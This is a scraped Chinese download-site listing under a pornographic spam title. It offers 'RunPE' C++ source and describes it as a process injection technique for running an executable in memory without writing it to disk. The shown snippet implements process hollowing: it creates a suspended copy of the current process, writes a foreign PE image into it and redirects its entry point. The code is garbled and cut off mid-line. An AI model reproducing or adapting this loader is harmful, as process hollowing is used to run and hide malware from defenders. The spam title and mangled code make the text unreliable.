91av视频/亚洲h视频/操亚洲美女/外国一级黄色毛片 - 国产三级三级三级三级

  • 大小: 2KB
    文件類型: .zip
    金幣: 2
    下載: 0 次
    發(fā)布日期: 2021-06-09
  • 語(yǔ)言: 其他
  • 標(biāo)簽: 加載exe??

資源簡(jiǎn)介

一種進(jìn)程注入技術(shù),有興趣稍加改動(dòng)可實(shí)現(xiàn)exe在不落地的情況下在內(nèi)存中動(dòng)態(tài)加載

資源截圖

代碼片段和文件信息 


#include??//?Standard?C++?library?for?console?I/O
#include??//?Standard?C++?Library?for?string?manip

#include??//?WinAPI?Header
#include??//WinAPI?Process?API


//?use?this?if?you?want?to?read?the?executable?from?disk
HANDLE?MapFileToMemory(LPCSTR?filename)
{
	std::streampos?size;
	std::fstream?file(filename?std::ios::in?|?std::ios::binary?|?std::ios::ate);
	if?(file.is_open())
	{
		size?=?file.tellg();

		char*?Memblock?=?new?char[size]();

		file.seekg(0?std::ios::beg);
		file.read(Memblock?size);
		file.close();

		return?Memblock;
	}
	return?0;
}

int?RunPortableExecutable(void*?Image)
{
	IMAGE_DOS_HEADER*?DOSHeader;?//?For?Nt?DOS?Header?symbols
	IMAGE_NT_HEADERS*?NtHeader;?//?For?Nt?PE?Header?objects?&?symbols
	IMAGE_SECTION_HEADER*?SectionHeader;

	PROCESS_INFORMATION?PI;
	STARTUPINFOA?SI;

	CONTEXT*?CTX;

	DWORD*?Imagebase;?//base?address?of?the?image
	void*?pImagebase;?//?Pointer?to?the?image?base

	int?count;
	char?CurrentFilePath[1024];

	DOSHeader?=?PIMAGE_DOS_HEADER(Image);?//?Initialize?Variable
	NtHeader?=?PIMAGE_NT_HEADERS(DWORD(Image)?+?DOSHeader->e_lfanew);?//?Initialize

	GetModuleFileNameA(0?CurrentFilePath?1024);?//?path?to?current?executable

	if?(NtHeader->Signature?==?IMAGE_NT_SIGNATURE)?//?Check?if?image?is?a?PE?File.
	{
		ZeroMemory(&PI?sizeof(PI));?//?Null?the?memory
		ZeroMemory(&SI?sizeof(SI));?//?Null?the?memory

		if?(CreateProcessA(CurrentFilePath?NULL?NULL?NULL?FALSE
			CREATE_SUSPENDED?NULL?NULL?&SI?&PI))?//?Create?a?new?instance?of?current
			//process?in?suspended?state?for?the?new?image.
		{
			//?Allocate?memory?for?the?context.
			CTX?=?LPCONTEXT(VirtualAlloc(NULL?sizeof(CTX)?MEM_COMMIT?PAGE_READWRITE));
			CTX->ContextFlags?=?CONTEXT_FULL;?//?Context?is?allocated

			if?(GetThreadContext(PI.hThread?LPCONTEXT(CTX)))?//if?context?is?in?thread
			{
				//?Read?instructions
				ReadProcessMemory(PI.hProcess?LPCVOID(CTX->Ebx?+?8)?LPVOID(&Imagebase)?4?0);

				pImagebase?=?VirtualAllocEx(PI.hProcess?LPVOID(NtHeader->OptionalHeader.Imagebase)
					NtHeader->OptionalHeader.SizeOfImage?0x3000?PAGE_EXECUTE_READWRITE);

				//?Write?the?image?to?the?process
				WriteProcessMemory(PI.hProcess?pImagebase?Image?NtHeader->OptionalHeader.SizeOfHeaders?NULL);

				for?(count?=?0;?count?FileHeader.NumberOfSections;?count++)
				{
					SectionHeader?=?PIMAGE_SECTION_HEADER(DWORD(Image)?+?DOSHeader->e_lfanew?+?248?+?(count?*?40));
					
					WriteProcessMemory(PI.hProcess?LPVOID(DWORD(pImagebase)?+?SectionHeader->VirtualAddress)
						LPVOID(DWORD(Image)?+?SectionHeader->PointerToRawData)?SectionHeader->SizeOfRawData?0);
				}
				WriteProcessMemory(PI.hProcess?LPVOID(CTX->Ebx?+?8)
					LPVOID(&NtHeader->OptionalHeader.Imagebase)?4?0);
				
				//?Move?address?of?entry?point?to?the?eax?register
				CTX->Eax?=?DWORD(pImagebase)?+?NtHeader->OptionalHea

?屬性????????????大小?????日期????時(shí)間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2016-11-07?15:37??RunPE-master\
?????文件????????3554??2016-11-07?15:37??RunPE-master\RunPE.cpp

評(píng)論

共有 條評(píng)論